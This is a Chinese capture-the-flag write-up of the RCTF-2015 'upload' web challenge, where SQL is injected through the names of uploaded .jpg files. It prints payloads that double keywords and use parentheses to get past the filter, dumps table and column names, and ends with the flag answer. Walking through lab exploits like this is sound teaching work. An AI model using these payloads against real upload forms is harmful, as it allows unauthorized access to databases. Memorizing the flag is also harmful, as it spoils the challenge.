攻防世界WEB进阶之upload
攻防世界WEB进阶之upload
- 第一步:分析
- 第二步:实操
- 第三步:答案
第一步:分析
难度系数: 1星
题目来源: RCTF-2015
题目描述:暂无
脑洞很大的一题,首先题目什么都没给出,进入场景,注册自己的账号,登录出现文件上传,上传很多文件都显示文件后缀不行,如实使用burpsuite的intruder功能,遍历众多文件列表,发现只有jpg文件可以上传,好吧,那就只上传它。
第二步:实操
接着进行文件上传,上传之后,文件名回显并且给出了一个id值用户的ID。
至此已经毫无头绪了,遂百度,有相关文章显示了使用sql文件名注入的方式实现。本人经过复现,发现其实场景是禁止了空格的传输,尝试很多种代替空格的办法。最后尝试到括号是可行的。
harry_jpg’,‘1660’,‘1660’),((database()),‘1660’,‘1660’)#.jpg文件名可以回显出数据库的名称
“harry_’,‘1660’,‘1660’),((SELSELECTECT(table_name)FRFROMOM(information_schema.tables)WHERE(table_schema=‘web_upload’)),‘1660’,‘1660’)#.jpg” 查询表名称的回显语句,仅仅返回了harry_的文件名其他未返回。
其他语句暂时未拼出,等待大佬解答。
- 分割线
以下内容摘自某人博客,因为无法复现,所以没有贴出链接
(1)查表名
lethe’,‘1660’,‘1660’),((selselectect(table_name) frfromom information_schema.tables where table_schema = ‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((%20selselectect%20group_concat(table_name)%20frfromom%20information_schema.tables%20where%20table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((//selselectect//group_concat(table_name)//frfromom//information_schema.tables//where//table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),(((1=0)selselectect(1=0)group_concat(table_name)(1=0)frfromom(1=0)information_schema.tables(1=0)where(1=0)table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
(2)查列名
lethe’,‘1660’,‘1660’),(( seselectlect group_concat(column_name) frfromom information_schema.columns where table_name= ‘hello_flag_is_here’ ),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((SELSELECTECT(GROUP_CONCAT(column_name))FRFROMOM(information_schema.columns)WHERE(table_name=‘hello_flag_is_here’),‘1660’,‘1660’)#.jpg
(3)查flag
lethe’,‘1660’,‘1660’),(( seselectlect i_am_flag frfromom hello_flag_is_here),‘1660’,‘1660’)#.jpg
第三步:答案
最终的flag为:RCTF{!!_@m_Th.e_F!lag}
攻防世界WEB进阶之upload相关推荐
- 攻防世界WEB进阶之upload1
攻防世界WEB进阶之upload1 一.分析 二.实操 三.答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一.分析 首先打开场景,上传文件进行抓包操作,发 ...
- 攻防世界web进阶区Web_php_wrong_nginx_config详解
攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...
- 攻防世界WEB进阶之ics-05
攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...
- 攻防世界web进阶区ics-05详解
攻防世界web进阶区ics-05详解 题目 解法 preg_replace ctype_alnum strpos X-Forwarded-For 题目 我们只能点击一个地方 解法 御剑扫描有一个css ...
- 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...
- 攻防世界web进阶区Web_python_block_chain详解
攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...
- 攻防世界WEB进阶之Cat
攻防世界WEB进阶之Cat 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只 ...
- 攻防世界web进阶区wtf.sh-150详解
攻防世界web进阶区wtf.sh-150详解 题目 详解 题目 看起来像一个论坛,可以注册,登录 详解 我们随便打开一个 尝试注入 并没有发现可以注入 注册发现,admin已经存在, 我们看看能不能二 ...
- 攻防世界 Web进阶(一)
嗯-,终于把新手区的题做完了,感觉学到了不少东西( •̀ ω •́ )y 今天来记录下进阶题 1.ics-06 打开题目,一个看起来看来很炫酷的页面,瞎点一会发现只有一个报表中心可以进 一开始以为是s ...
最新文章
- Rest Framework:序列化组件
- linux下文件操作
- Spring整合Hibernate 二 - 声明式的事务管理
- oracle 子表数据变化时主表也会更新_亿信ABI版本重大更新,新增60余个实用新功能,还有一项黑科技...
- mac 卸载编辑器卸不干净
- ref 和out 关键字
- 默认网关出现乱码_SpringCloudZuul服务网关
- vue -- router路由跳转错误 , NavigationDuplicated
- 使用opencv和python进行智能图像处理pdf_OpenCV图像处理编程实例 PDF 高清版
- R语言检验时间序列中是否存在自相关性:使用box.test函数执行box-pierce检验验证时间序列中是否存在自相关性
- mcu,单片机选型以及厂家推荐
- Unity报错(bug)
- swift/dart代码规范检查工具介绍
- 究极摸鱼挂科王终于击败了无敌可怕Vulkan大魔王
- 手机号码清洗的优势是什么
- java计算机毕业设计冠军体育用品购物网站MyBatis+系统+LW文档+源码+调试部署
- Excel图表设置X轴位置为最底部
- BVR电线与RV电线的区别有哪些?
- 163电子邮箱注册登录入口是?企业邮箱和163邮箱有什么区别?
- matlab定义未知大小矩阵,MATLAB中未知长度的矩阵?